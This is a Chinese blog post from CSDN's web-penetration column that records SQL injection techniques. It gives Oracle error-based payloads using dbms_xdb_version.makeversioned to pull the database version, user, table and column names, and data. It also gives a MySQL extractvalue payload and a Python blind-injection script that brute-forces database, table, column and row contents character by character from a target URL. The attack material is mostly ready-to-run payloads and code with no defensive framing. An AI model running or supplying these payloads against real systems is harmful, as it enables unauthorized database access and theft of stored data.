SQL注入记录

最新推荐文章于 2024-05-14 08:53:38 发布
最新推荐文章于 2024-05-14 08:53:38 发布
阅读量173 收藏
点赞数
分类专栏: web渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhuoyang111/article/details/96308110
版权

报错注入:

oracle payload:

获取数据库版本

a' or (select dbms_xdb_version.makeversioned((select banner from sys.v_$version where rownum like 1)) from dual) like 'a

获取用户名

a' or (select dbms_xdb_version.makeversioned((select user from dual)) from dual) like 'a

获取表名

a' or (select dbms_xdb_version.makeversioned((select table_name from all_tables where rownum like 1)) from dual) like 'a

获取下一个表名

a' or (select dbms_xdb_version.makeversioned((select table_name from all_tables where rownum like 1 and table_name not like 'DUAL')) from dual) like 'a

获取表中的列名

a' or (select dbms_xdb_version.makeversioned((select column_name from all_tab_columns where table_name like 'SYSTEM_PRIVILEGE_MAP' and rownum like 1)) from dual) like 'a

获取下一个列名

a' or (select dbms_xdb_version.makeversioned((select column_name from all_tab_columns where table_name like 'SYSTEM_PRIVILEGE_MAP' and rownum like 1 and column_name not like 'PRIVILEGE')) from dual) like 'a

获取数据

a' or (select dbms_xdb_version.makeversioned((select name from SYSTEM_PRIVILEGE_MAP where rownum like 1)) from dual) like 'a

Mysql payload:

extractvalue(rand(),+concat(0x3a,substring(version(),1,30)))

盲注:

import requests

url1 = "https://www.test.com/search/index/?param1=1+or+"
url2 = "--+&param2=aaa&param3=1"

# 盲注获取数据长度
def getlength(payload):
    length = 0
    url = url1 + payload + str(length) + url2
    #print url
    r = requests.get(url)
    while(len(r.content) < 70000):    #这里判断根据返回数据长度来区分
        length = length + 1
        payload_tmp = payload + str(length)
        url = url1 + payload_tmp + url2
        r = requests.get(url)
    print length
    return length

#盲注对字段每个字符逐一爆破
def getstr(payload):
    i = 0
    #all_str = "_abcdefghijklmnopqrstuvwxyz"
    all_str = "_.-@%$#!<>'?abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"
    like_str = "='" + all_str[i] + "'"
    url = url1 + payload + like_str + url2
    r = requests.get(url)
    while(len(r.content) < 70000):
        i = i + 1
        like_str = "='" + all_str[i] + "'"
        url = url1 + payload + like_str + url2
        #print url
        r = requests.get(url)
    print all_str[i]
    return all_str[i]

#数据库字段
database_length = getlength("length(database())=")
database_str = ""
for i in range(1, database_length + 1):
    payload = "(substr(database()," + str(i) + ",1))"
    database_str += getstr(payload)

#数据库表字段
table_count = getlength("(select+count(*)+from+information_schema.tables+where+table_schema='database')=")
table_name_str = ""
for i in range(1, table_name_len + 1):
    payload = "(substr((select+table_name+from+information_schema.columns+where+table_schema='database'+and+column_name='password'+limit+0,1)," + str(i) + ",1))"
    table_name_str += getstr(payload)

#表中列字段
colume_count = getlength("(SELECT+COUNT(*)+FROM+information_schema.COLUMNS+WHERE+TABLE_SCHEMA='database'+AND+TABLE_NAME='table')=")

for i in range(0, colume_count):
	column_name_length = getlength("length((select+column_name+from+information_schema.columns+where+table_schema='database'+and+table_name='table'+limit+"+str(i)+",1))=")
	columu_name_str = ""
	for j in range(1, column_name_length + 1):
		payload = "(substr((select+column_name+from+information_schema.columns+where+table_schema='database'+and+table_name='table'+limit+"+str(i)+",1)," + str(j) + ",1))"
		columu_name_str += getstr(payload)

	print columu_name_str

#获取数据
data = ""
data_len = getlength("length((select+val+from+table+order+by+create_time+desc+limit+0,1))=")
print data_len 
for i in range(1, data_len + 1):
	payload = "(substr((select+val+from+table+order+by+create_time+desc+limit+0,1)," + str(i) + ",1))"
	data += getstr(payload)
print data

 

zhuoyang111
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入学习记录
一只菜鸡
02-22 715
前置知识: 1.mysql数据库的一些基本使用:增删改查 2.python脚本的使用 3.了解php中常见的与mysql相关的函数和类 0x01:数据库基础 1.基础操作 查看库名: mysql> show databases; 创建库: mysql> creat database test; 删除库: mysql> drop database test; 使用库: mysql> user test 创建表: mysql> create table test( -> `i
SQL注入
weixin_64655821的博客
10-23 833
SQL注入
整理一些关于SQL注入记录
HeLow_的博客
11-30 35
header注入,该注入是指利用后端验证客户端信息(比如常用的cookie验证)或者通过header中获取客户端的一些信息(比如User-Agent用户代理等其他header字段信息),因为这些信息在某些地方是会和其他信息一起存储到数据库中,然后再在前台显示出来,又因为后台没有经过相对应的信息处理所以构成了sql注入
干货 | Oracle注入和漏洞利用姿势总结
Javachichi的博客
01-17 2068
Oracle Database,又名 Oracle RDBMS,或简称 Oracle。是甲骨文公司的一款关系数据库管理系统。它是在数据库领域一直处于领先地位的产品。可以说 Oracle 数据库系统是世界上流行的关系数据库管理系统,系统可移植性好、使用方便、功能强,适用于各类大、中、小微机环境。它是一种高效率的、可靠性好的、适应高吞吐量的数据库方案。
2024年Go最新干货 Oracle注入和漏洞利用姿势总结,统统都会
最新发布
qq_38197819的博客
05-14 450
从 Oracle 8i 开始,Oracle Database 允许在数据库中存储和执行 Java,并提供了 Java 池,用于存放 Java 代码、Java 语句的语法分析表、Java 语句的执行方案和 Java 虚拟机中的数据,以便进行 Java 程序开发。在实际利用中,如果我们获取了 Oracle 管理员级别的用户凭据,可以通过 DBMS_SCHEDULER 包中存储过程创建程序/作业对象,来调度操作系统的可执行文件或脚本,从而执行系统命令。此外,还需要数据库服务器可以出网。
简单的sql注入记录
weixin_45292488的博客
12-27 34
萌新的sql注入
WEB渗透测试知识梳理-注入类-1-SQL注入-Oracle
痴人说梦梦中人
06-17 2654
1.3.2 ORACLE 注入 1.3.2.1 报错注入 1.3.2.2 布尔盲注 1.3.2.3 时间盲注 1.3.2.4 宽字节注入 1.3.2.5 二次注入 1.3.2.6 联合注入 1.3.2.7 堆查询注入
手动sql注入记录
黑面狐
09-28 2627
一、寻找注入点 这个是我们的测试环境,在id后加单引号后报sql错误,所以这里是存在sql注入的。 根据错误的提示可以看出来使用的是mysql数据库。 二、猜测列表的列数 猜测列表的列数一般使用order by的方法 ?id=1 order by 4 一般先假设一个数字,比如10,报错则说明表的列数小于10,然后设置为5,用二分法,慢慢尝试直到找到一个报错和不报错连接的
sql注入网站源码
04-09
6. **日志和监控**:设置日志系统记录异常请求,并定期监控,以便尽早发现潜在的SQL注入攻击。 7. **代码审计**:定期进行代码审查,查找可能的SQL注入漏洞,尤其是在使用第三方库或组件时。 8. **Web应用防火墙...
超级SQL注入工具
03-31
【超级SQL注入工具】是一种专门用于测试和诊断SQL注入漏洞的高级工具,它允许安全研究人员或渗透测试者模拟攻击者的行为,找出并修复数据库的安全弱点。SQL注入是一种常见的网络安全威胁,通过利用不安全的Web应用...
sqlmap sql注入
08-22
SQLMap是一款强大的自动化工具,主要用于检测和利用SQL注入漏洞。SQL注入是一种常见的网络安全问题,攻击者通过在Web应用程序的输入字段中插入恶意SQL代码,来操纵数据库,获取未经授权的数据访问或执行其他恶意操作...
SQL注入漏洞演示源代码
07-15
SQL注入漏洞是网络安全领域中的一个重要话题,它涉及到数据库管理和Web应用程序的安全性。在这个"SQL注入漏洞演示源代码"中,我们可以深入理解这种攻击方式的工作原理,并学习如何防止它。 SQL注入是通过在输入字段...
sql注入神器.zip
07-01
SQL注入是一种常见的网络安全漏洞,它发生在应用程序未能充分验证或过滤用户输入的数据,导致恶意SQL代码被插入到数据库查询中。这种攻击方式可以让攻击者获取、修改、甚至删除数据库中的敏感信息,对系统的安全性...
Oracle注入
秋水的博客
09-03 6475
Oracle数据库 Oracle数据库也是一种关系数据库,此数据库体量较大,一般与jsp网站联合 既然是关系数据库,肯定也是存在一些关系表,在Oracle数据库中,库的概念被淡化,强调用户 Oracle注入之联合查询 注入原理 其注入原理与MySQL一致,都是基于回显的注入,通过union all select来获取我们想要的数据 引入知识 dual表,此表是Oracle数...
sql注入总结
wuqiongrj的博客
07-22 7691
本实验测试是基于sqli-labs的实验环境 环境配置:php+mysql 环境搭建请参考 http://www.freebuf.com/articles/web/34619.html   Sql注入定义: 就是通过把sql命令插入到web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行的sql命令的目的   sql注入分类: 基于联
80.网络安全渗透测试—[SQL注入篇19]—[Oracle+JSP-9种报错注入]
qwsn
01-20 2739
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、Oracle+JSP 报错注入:`9种` 1、utl_inaddr.get_host_name()进行报错注入 2、ctxsys.drithsx.sn()进行报错注入 3、XMLType()进行报错注入 4、dbms_xdb_version.checkin()进行报错注入 5、bms_xdb_version.makeversioned()进报错注入 6、dbms_xdb_version.uncheckout()进行报
分析SQL执行记录,发现SQL中的注入点
u014008201的博客
08-23 1753
不只一次有人对我说: SQL注入已经过时了。 现在的WEB应用已经很难被注入了。 还好最近看到一份针对乌云漏洞库的统计数据(https://zhuanlan.zhihu.com/p/21373306), 其结果明确的指出 SQL注入漏洞仍然是目前WEB应用中数量最多的漏洞。 亡羊补牢,不如思患预防,最完美解决SQL注入的方法是程序中没有SQL注入点。即程序中不使用字符串拼接SQL,而全部使用
Oracle数据库利用教程
m0_48520508的博客
09-09 303
一、联合注入 1.1、判断是否存在注入点 方法和其他数据库类似,and 1=1 和and 1=2 1.2、判断数据库为oracle 注释符号–,该符号是Oracle和MsSQL支持的注释符,返回正常就需要继续判断。可以继续提交多语句支持符号;如果支持多行查询,说明是MSSQL,因为Oracle不支持多行查询,可以继续提交查询语 and (select count(*) from user_tables)>0-- 利用的原理是dual表和user_tables表是oracle中的系统表,返回正常就
SQL注入漏洞详解与实战教程
本资源是一份关于Web渗透测试入门的教程,重点讲解了SQL注入漏洞的相关知识。SQL注入漏洞是Web安全领域的一个严重威胁,它发生在黑客通过恶意构造SQL语句,利用应用程序处理用户输入时的不当过滤或转义,获取、修改...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值